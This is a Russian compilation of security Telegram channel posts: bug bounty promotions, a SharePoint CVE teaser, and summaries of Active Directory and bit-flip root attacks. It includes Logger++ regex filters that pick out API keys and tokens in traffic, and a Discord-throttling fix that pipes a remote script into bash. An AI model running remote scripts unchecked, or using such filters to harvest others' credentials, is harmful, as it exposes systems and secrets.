10 сентября компания Microsoft выпустила очередную подборку обновлений, устранив 79 уязвимостей в различных продуктах. Наше внимание привлекли патчи для Microsoft SharePoint — обширной системы с функциями управления сайтами (content management system, CMS). Из пяти уязвимостей, вошедших в сентябрьский выпуск, четыре позволяли исполнять сторонний код (remote code execution, RCE), одна — создавала угрозу DoS. Мы выбрали для анализа CVE-2024-38227 — RCE-уязвимость привилегированного пользователя. Для нас такое исследование — это возможность изучить сам Microsoft SharePoint и понять текущую теорию его эксплуатации (state-of-the-art).

🔥 Читать далее

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча

😆 «Т-Банк» добавил в скоуп ИИ-продукты

Ведь за искусственным интеллектом — будущее. На нашей платформе появились новые продукты от «Т-Банка» для исследования. Среди них:

🔵Приложения из «Вселенной ассистентов»: «Финассистент», «Шопинг-ассистент», «Секретарь», «Тревел-ассистент».
🔵«Умная камера».
🔵Сервисы VoiceKit и T-fusion.
🔵Чат-бот в приложении и на сайте банка.

За найденные уязвимости вас ждет награда до 1 миллиона рублей.

Вперед на поиски уязвимостей!

😍 Đây là cơ hội của bạn để Đến Việt nam với Chúng tôi và tham gia Vào Standoff Hacks

Если ты не понял ничего, кроме Standoff Hacks, объясняем: следующий priv8-ивент для хакеров пройдет во Вьетнаме 30 ноября, и ты можешь полететь туда вместе с нами.

Как? Найди и сдай до 29 октября как можно больше багов по этим публичным программам:

• Positive Technologies (все программы)
• Standoff 365
• VK (все программы)
• Т-Банк
• Азбука вкуса
• Ozon
• Okko
• Wildberries
• Rambler&Co
• ATI.SU

2️⃣ Двоих багхантеров, которые с момента публикации поста наберут суммарно больше всего очков по этим программам, берем с собой в Ханой (за наш счет!). Трое топовых исследователей по очкам и выплатам уже в списке приглашенных, не хватает только тебя.

Будем подводить промежуточные итоги, чтобы ты видел результаты и оценивал шансы — свои и конкурентов.

Ну что? 3, 2, 1… го багхантить!

🎙️ Новый выпуск подкаста про Bug Bounty – триаж уязвимостей

Сперва мы послушали багхантеров – узнали про их будни, достижения и «хотелки», а теперь настал черед тех, кто находится по другую сторону Bug Bounty. 😎

Позвали Дарью Афанасову (Standoff Bug Bounty), Елизавету Дудко (Т-Банк), Никиту Кузякина (BI.ZONE.Bug Bounty) и Петра Уварова (VK Bug Bounty), чтобы обсудить с ними насущные вопросы и проблемы триажа, а также ответить на «боли» багхантеров.

О чем поговорили ❓

🔹 Отчеты: процесс валидации, советы по оформлению и дисклоузы
🔹 Дубликатные дубликаты
🔹 Выплаты, бонусы и специальные программы
🔹 Хватает ли багхантеров на российском рынке Bug Bounty?
🔹 Советы начинающим ресерчерам

📺 Смотрите, что триажеры рассказали Сергею poxek Зыбневу, ведущему этого выпуска подкаста «Рынок уязвимостей»:

📺 VK Video | 📺 YouTube | 📺 RUTUBE

💻 Базовые атаки на AD. Разбираем Kerberoasting, AS-REP Roasting и LLMNR Poisoning
#AD #microsoft #windows

В этой статье автор показал нес­коль­ко атак на Active Directory, пореко­мен­довал ути­литы для экс­плу­ата­ции и рас­ска­зал об инди­като­рах, на которые нуж­но обра­щать вни­мание при рас­сле­дова­нии инци­ден­тов. А упражнять­ся будем на лабора­тор­ных работах Sherlocks с пло­щад­ки Hack The Box.

🔓 xakep.ru

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча

По поводу нового худи, всё печально. Буквально 1-2 человека захотело заказать его. А заказ на производстве от 20 штук, следовательно если нет спроса, то этот мерч отменяется. Буду делать другой, с более политкорректным дизайном)

Стать сотрудником Яндекса быстрее и проще, чем кажется. Участвуйте в Фаст Треке и получите офер за два дня.

Ближайшие Fast Track мероприятия:

• 26-27 октября — для инженеров по безопасности (Инженеры AppSec, InfraSec, инженеры и аналитики SOC).

Зарегистрироваться

😈 Кастомные правила Logger++
#logger #burpsuite #portswigger

Все знакомы с Logger++ в Burp Suite, но мало кто его использует. Хотя в Logger из коробки есть недостатки некоторые, с которыми лично я не встречался, но в разных чатах порой вижу жалобы. Для таких ценителей высокого было разработано расширение Logger++. Преимуществ у него много, можете прочитать на сайте.

Но естественно я пишу этот пост не ради напоминания об этом расширении, а о расширении этого расширения. Как бы странно это не звучало)

Logger++ Custom Filters - очередной индус написал годноту для нас) Собственно это список фильтров для Logger++, который позволит в real time подсвечивать вам какие-нибудь "точки интереса" или ключи, которые пролетают в запросах и ответах.
В посте собрал самые интересные на мой взгляд:

➡️REST API

(Request.Path CONTAINS "api" OR Request.Host CONTAINS "api") AND !(Request.Method == "OPTIONS

➡️GraphQL

(Request.Path CONTAINS "graphql" OR Request.Host CONTAINS "graphql") AND !(Request.Method == "OPTIONS")

➡️Google_API_Key

Response.Body == /AIza[0-9A-Za-z\\-_]{35}/

➡️GCP_OAUTH_KEY

Response.Body == /[0-9]+-[0-9A-Za-z_]{32}\\.apps\\.googleusercontent\\.com/

➡️GCP_Service_KEY

Response.Body == /\"type\": \"service_account\"/

➡️GOOGLE_OAUTH_KEY

Response.Body == /ya29\\.[0-9A-Za-z\\-_]+/

➡️Firebase_URL

Response.Body == /.*firebaseio\.com/

➡️GitHub_KEY

Response.Body == /[g|G][i|I][t|T][h|H][u|U][b|B].*['|\"][0-9a-zA-Z]{35,40}['|\"]/

➡️CSRF & SSRF

Request.Method == "POST" AND !(Request.Headers CONTAINS "Content-Type: application/json" OR Response.Headers CONTAINS "application/json")

Request.Method == "POST" OR (Request.Headers CONTAINS "Content-Type: application/json" AND Request.Headers CONTAINS "Content-Length: 0")

(Request.Query MATCHES ".*(http%3A%2F%2F|https%3A%2F%2F)?(www.)?[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,5}.*" OR Request.Body MATCHES ".*(http%3A%2F%2F|https%3A%2F%2F)?(www.)?[a-z0-9]+([\-\.]{1}[a-z0-9]+)*\.[a-z]{2,5}.*")

➡️CORS Misconfiguration

!(Request.Headers CONTAINS "Authorization:") AND (Response.Headers CONTAINS "Access-Control-Allow-Credentials" OR Response.Headers CONTAINS "Access-Control-Allow-Origin")

📱 Github

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча

🚀 Прикури от root'а: как взломать Linux с помощью зажигалки

Бомбовый материал от David'а Buchanan'а — атака с использованием обычной зажигалки для bit-flip'а в памяти! 📲🔥

Исследователь показал, как с помощью электромагнитных импульсов, создаваемых пьезоэлектрическим воспламенителем зажигали, можно вызвать аппаратные сбои в памяти, получить произвольный доступ к данным и поднять привилегии до root на Linux.

Суть эксплойта:
- Припаиваем антенну к шине DDR3 💻
- Щелкаем зажигалкой 🔥
- Ловим переворот бита 🎯
- Эксплуатируем CPython, создавая примитив для чтения/записи в памяти 📜
- Загружаем shell-код и получаем root 🏴‍☠️

💥 Эта статья замечательный пример демонстрации того, как изящно можно использовать физические уязвимости для реальных атак.

Полный разбор + код здесь:
[PoC]
[Оригинальная статья]

Берите на вооружение ;)
Спейсинвейдера жми
👾

Подборка должностей в ИБ от "Инфосистемы Джет"
#jetinfo #должностная_карта

Часто стал слышать, что вот в пентесте конкуренция высокая. Что правда, но а чего вы ожидали?)

Поэтому для тех, кто не хочет в пентест или боится конкуренции, вот табличка понятная.

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча

ПРЕДЗАКАЗ Новый мерч Похек | Оверсайз Худи Вы мержите Мы смотрим
#похек #poxek #мерч

⚡️ Коллаборация с каналом Blue (h/c)at Café

❗️ https://shop.poxek.cc/product/hudi-vy-merzhite-my-smotrim

➡️После 20 предзаказов оформлю его и будет готово через 15-20 дней

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча

Нам так понравилось общаться с багхантерами, что мы попросили каждого гостя подкаста ответить еще на несколько вопросов в формате блиц.

👀 Сегодня смотрим и слушаем, что Алексей Трофимов (он же kwel), ответил на вопросы:

🍎 Низко висящий фрукт или Kill Chain?
😎 Приватка или паблик?
🍿 Охота за багами или отдых на ивенте?
🤓 Самая первая бага, за которую получил вознаграждение
💲 Самая большая выплата

#bugbounty

А сегодня смотрим блиц с Юрой circuit Ряднина.

Итак, вопросы те же:

🔗 Kill Chain или низко висящие фрукты?
🏖 Отдых на ивенте для багхантеров или поиск багов?
🤫 Приватка или паблик?
👾 Самая первая бага и самая большая выплата?

а вот ответы… 👀 вас, возможно, удивят.

PS: кстати, а как вам выпуск подкаста с багхантерами? Уже успели посмотреть? Если нет, то впереди выходные – запасайтесь попкорном и го смотреть 🍿

📱 VK Видео | 📱YouTube | 📺 RUTUBE

#bugbounty

Развитие ББ ВК От старых до новых багов - Andrey - azimoff

SafeCode 2024 Autumn — конференция по безопасности приложений. Это мероприятие для всех, кто хочет писать безопасный код — разработчиков, специалистов SAST/DAST, AppSec-инженеров, security-чемпионов и тестировщиков.

Конференция пройдет 30 октября, онлайн.

В программе — более 15 выступлений:
— Доклады о безопасной авторизации, бинарных атаках, процессах DevSecOps, прикладной криптографии, анализе кода, фаззинге и угрозах генеративного ИИ.
— Интервью с экспертом ИБ Денисом Макрушиным, мейнтейнером CPython Никитой Соболевым, экспертом по кибербезопасности из Kaspersky Сергеем Головановым.
— Воркшоп по безопасным контейнерам и мастер-класс по поиску уязвимостей сайта.

Подробности о докладах — на сайте SafeCode.

При покупке билета «Для частных лиц» за свой счет используйте промокод на скидку 15% — POXEK

Билет на конференцию можно купить за счет компании. Почему это выгодно не только вам, но и работодателю — читайте в статье на VC.

Реклама. ООО «Джуг Ру Груп». ИНН 7801341446

Web.archive.org взломан

Кем и как - пока неизвестно.
Антиизраильские хактивисты, которые одновременно и публично проводили DDOS на данный ресурс за поддержку Израиля утверждают, что это не они.

Могли пострадать 31 миллион пользователей ресурса.

Взлом подтвердили профильные ИБ-журналисты.

Обход замедления Discord в 5 шагов
#заметка

1. Открываем консоль Google — тут. У меня консоль открывалась очень долго, просто подождите.
2. curl -sSL https://raw.githubusercontent.com/ImMALWARE/bash-warp-generator/main/warp_generator.sh | bash
3. Там сформируется WARP.conf в текстовом варианте и в виде ссылки.
4. Скачайте клиент AmneziaWG: Windows, Linux
5. Импортируем конфиг и запускаем

🌚 @poxek | 📺 Youtube | 📺 RuTube | 📺 VK Видео | 🌚 Магазин мерча